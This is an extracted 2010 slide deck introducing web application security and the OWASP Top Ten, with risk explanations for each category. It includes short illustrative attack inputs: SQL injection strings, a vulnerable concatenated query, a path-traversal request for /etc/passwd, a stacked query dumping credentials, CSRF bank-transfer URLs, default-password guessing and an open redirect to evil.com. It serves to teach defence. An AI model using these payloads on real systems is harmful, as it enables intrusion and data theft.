2010-09-23

1

1

Web application security and

OWASP Top Ten 2010

Dr. Ulf Larson

Omegapoint

2

2010-09-23

2

What is application security?

• Def:– That appropriate measures are taken during the

lifecycle of an application,

– to prevent violations of the application‟s security policy,

– due to errors in design, development, operation,

upgrade and/or maintenance

• or, more informally:– even the slightest coding error may lead to utter chaos,

disaster and destruction of mankind (well…)

3

Pop Quiz

• Give me at two examples of where you

really need to assure

– That appropriate measures are taken during the

lifecycle of an application,

– to prevent violations of the application‟s security policy,

– due to errors in design, development, operation,

upgrade and/or maintenance

• to prevent utter chaos…

4

2010-09-23

3

So, why would I (personally) need

application security?

5

Dancing cows

(or pigs)…

Many, really cool

buttons

I run a small business and put my money in

business value instead => money in => Good for me!

Yeah! Good for you, until:

• One week before <random holiday where peoplespend LOTS of money>, your webshop dives just to come up two weeks later…

• The accountant from the credit card company realisesthat ”Yes we are compliant” actually ment “No we aren‟t compliant, but you don‟t know that”

• A considerable portion of this year‟s vacation is spentcalming our customers since they noticed that their”private” pictures were all over the Internet…

6

2010-09-23

4

Yeah! Good for you, until:

• One week before <random holiday where peoplespend LOTS of money>, your webshop dives just to come up two weeks later…

• The accountant from the credit card company realisesthat ”Yes we are compliant” actually ment “No we aren‟t compliant, but you don‟t know that”

• A considerable portion of this year‟s vacation is spentcalming our customers since they noticed that their”private” pictures were all over the Internet…

7

And, oh yeah. It happens

8

2010-09-23

5

Doesn‟t sound too cool…

What‟s wrong?

9

Number of websites has increased(didn‟t see that one coming, right…)

More powerful, interconnected

websites that allow user interaction

Is there more?

10

”Exotic” selection of passwords

123456

12345

123456789

password

iloveyou

Encryption, or lack thereof…

2010-09-23

6

Ok, I‟m prepared, what‟s next?

11

Tools, documentation and working exploits, of course!

Freely available to anyone (or the highest bidder)

…and finally

Application code contain (lots of) known vulnerabilities

"SELECT id FROM user WHERE username = '" + name + "'";

name = ' or 1=1 --

Logging in without knowing username or password

2010-09-23

7

Which leads to the following

13

ASP ASPXCold

FusionStruts JSP PHP Perl

Percentage of

sites that have

had at least one

serious

vulnerability

74 % 73 % 86 % 77 % 80 % 80 % 88 %

Percentage of

sites that have at

least one serious

vulnerability

57 % 58 % 54 % 56 % 59 % 63 % 75 %

Source: Website security statistics report, Tom Brennan, 2010

14

Web communication basics

A really, really, really brief background

2010-09-23

8

Web communication basics

• Http is a network application level protocol.

• A web browser at the client side communicates with one or more servers

• The browser makes a request, and the server responds with a response.

• To keep state between requests, the server generates a session token. This ID is passed between the browser and server with each request/response

• A cookie is a piece of data that can be passed with request/responses

15

ServerClient

Common communication pattern –

development and code

16

1. Someone develops code and put

it here (html, javascript, jsp, java)

3. The server responds…

…and part of the code goes here

to represent the response

2. The client asks the server for

a resource… (request)

… and part of the code

service the request

2010-09-23

9

Common communication

pattern - login

17

http://host.com?username=ulf&password=ulf

Select * from users where

username = ulf and

password = ulf

[true, userObject]

sessionID = xp33xx

…

<body> Hello

<% userObject.name %>

</body>

ServerClient

Pop quiz: Where do security bugs

cause problems?

18

HereHere

Here

Here

2010-09-23

10

19

OWASP top ten 2010

First: What is OWASP?

• Open Web Application Security Project

• Non-profit organization with goal to make

application security visible, such that

informed security decisions can be made

– Wiki (www.owasp.org)

– Blog (owasp.blogspot.com)

20

2010-09-23

11

What is OWASP doing?

• Manages and runs several projects within

the application security area

• Projects determine their own focus

– Guidelines for secure testing and code review

– Software for proxying and fuzzing

– Framework for implementing security oriented

design principles (ESAPI)

– Top ten list

21

OWASP Top Ten 2010

• OWASP Top Ten lists the ten most

dangerous application vulnerabilities

with respect to risk

22

Risk is based on generic parameters, such as empirically

observed amounts of vulnerabilities

Risk is NOT based on who a specific attacker is or what

consequences an attack has on business value

2010-09-23

12

Top Ten 2010

23

A1 – InjectionA2 – Cross Site

Scripting (XSS)

A3 – Broken

Authentication and

Session

Management

A4 – Insecure

Direct Object

Reference

A5 – Cross Site

Request Forgery

(CSRF)

A6 – Security

Misconfiguration

A7 – Insecure

Cryptographic

Storage

A8 – Failure to

Restrict URL

Access

A9 – Insufficient

Transport Layer

Protection

A10 – Unvalidated

Redirects and

Forwards

Input data from untrusted source (external system, user at webbrowser)

is interpreted as code or part of query (SQL, Xpath), rather than input

data.

A1 – Injection

Example (normal use)

24

Select * from users where uname=„ulf‟;

HTTP SQL

Login

2010-09-23

13

A1 – Injection

Example (misuse -> attack)

25

Select * from users where uname=„‟ or 1=1 --‟;

HTTP SQL

Login

A1 – Injection

Risk

26

It is easy to create

text input („ or 1=1)

Many types, SQL, Xpath, LDAP…

Use tools, exploit bad fault management

Loss of data, arbitrary

code execution, denial of service

2010-09-23

14

Data is sent from server to webbrowser without validation or output data

encoding. Sent data is interpreted as script code (and not data).

A2 – Cross Site Scripting

…

Example (normal use)

27

Hej! coolt

blogginlägg

eller vad!

Send comment

Read comment

A2 – Cross Site Scripting

Example (misuse)

28

Send comment

Read comment

2010-09-23

15

A2 – Cross Site Scripting

Risk

29

Could be tricky to create textdata

with correct syntax (<script>…)

Data is passed between browser

and server all the time

Submit data, watch result, look at

source code of browser page

Session hijacking,

redirect traffic to other site

Mechanisms for authentication and session management between server

and client are incorrectly implemented. The attacker may find passwords

and session IDs, as well as being able to steal users‟ identities.

A3 – Broken Authentication …

Example: Public computer, user Alice logs on to her bank

30

Alice closes(!) the browser window and

walks away.

Login

Auth-ID

Auth-ID

Timeout = 5 days

2010-09-23

16

A3 – Broken Authentication …

Example: Eve navigates to the bank on the same computer

somewhat later…

31

…and can suddenly perform transactions

as Alice, without having to log in first(!)

Auth-ID

Auth-ID

Timeout = 5 days

An object reference (for example a file) is made visible for users. If access

control is not performed when the object is refered to, the user can try to

instead refer to other objects.

A4 – Insecure Direct Object Ref.

Example (normal use)

32

www.company.com/getFile?file=info.txt

info.txt

2010-09-23

17

A4 – Insecure Direct Object Ref.

Example: (misuse)

33

www.company.com?file=../../../etc/passwd

/etc/passwd

No access

control for

/etc/passwd

An attacker creates a normal server request and then tricks a logged in

user to carry out this request. The request is carried out with the user‟s

privileges.

A5 – Cross Site Request Forgery

Example (normal use)

34

www.bank.com/transfer?amount=10&account=123

+ 10

2010-09-23

18

A5 – Cross Site Request Forgery

Example: (misuse)

35

www.bank.com/transfer?amount=100&account=223

+ 100

Look! Super

cool link!

www.bank.com/transfer?amount=100&account=223

”click” 2

1

One or more components (application, framework, webserver, application

server) in a system is not securely configured. An attacker uses any of

these configuration mistakes.

A6 – Security Misconfiguration

Example: IIS remote administration application running on port

8098 (default)

36

https://www.server.com:8098

Why not guess <admin:admin>, or brute

force

2010-09-23

19

A6 – Security Misconfiguration

Example: well…

37

Then what? – Change admin pass, create user…

<admin, admin>

I have seen cases where there is no user name, just password…

An application stores sensitive information (credit card details, PII, patient

journals) in the clear or with insufficient encryption or hash. An attacker can

then use stolen information directly.

A7 – Insecure Cryptographic Storage

Example: Username and password are stored in the clear on disk…

38

Insert into creds (“uname”,”pw”) values (“ulf”,”ulf”);

<ulf,ulf>1 2

2010-09-23

20

A7 – Insecure Cryptographic Storage

…and then get stolen during an attack. The attacker can use

the stolen information right away (no cracking or guessing

needed)

39

listUser.aspx?id=1 ; select * from creds;

<ulf,ulf>

1

2

3

An access control is performed before a link is rendered in the web

browser. If a user instead of clicking on the link directly navigates to the

adress the link points to, the control is bypassed.

A8 – Failure to Restrict URL Access

Example: Access control on the same page as the links and

before the links are generated

40

Logged in as admin Logged in as normal user

<a href=“CreateUser.html”>Skapa …

2010-09-23

21

A8 – Failure to Restrict URL Access

Example: What happens if you instead of following the link…

41

…type the address to the page where

the link points?

Sensitive information (e.g., username and password) travels between

client and server. If the travel path is unprotected, uses weak encryption or

is misconfigured, the attacker can use this to his advantage.

A9 – Insufficient Transport Layer Prot.

Example: (normal use)

42

HTTPS (SSL3/TLS)

[t56x99e!xpW]

-----.omegapoint.se

2010-09-23

22

A9 – Insufficient Transport Layer Prot.

Example (misconfiguration -> inconsistent use of HTTP/HTTPS)

43

HTTPS://www.secure.com/myLogin.aspx

[xa345tyjF!aa] (Auth-ID = 33)

HTTP://www.secure.com/viewProfile.aspx

Auth-ID = 33

1

2

An application performs a redirect or forward of a request, based on input

data that the attacker can choose. The attacker can redirect the request to

a target of its choice (for example a phishing site).

A10 – Unvalidated Redirects and Forwards

Example: (normal use)

44

Ok, you‟ re going to www.omegapoint.se

www.omegapoint.se

www.iwa.com/redirect?

url=www.omegapoint.se“click”1

2

3

4

2010-09-23

23

A10 – Unvalidated Redirects and Forwards

Example: (misuse)

45

Check it out!

Super cool link!

www.iwa.com/redirect?

url=www.evil.com

2

3

4

www.evil.com

www.iwa.com

1

Summary

• Web applications are becoming morecommon and powerful, thus attractingattackers in an increasing rate!

• OWASP tries to emphasize the importance of application security

• The top ten list covers the ten vulnerabilitiescarrying the highest risk

• Injection and Cross Site Scripting most risky– Common, easy to find and use, high impact

46

http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202010.pdf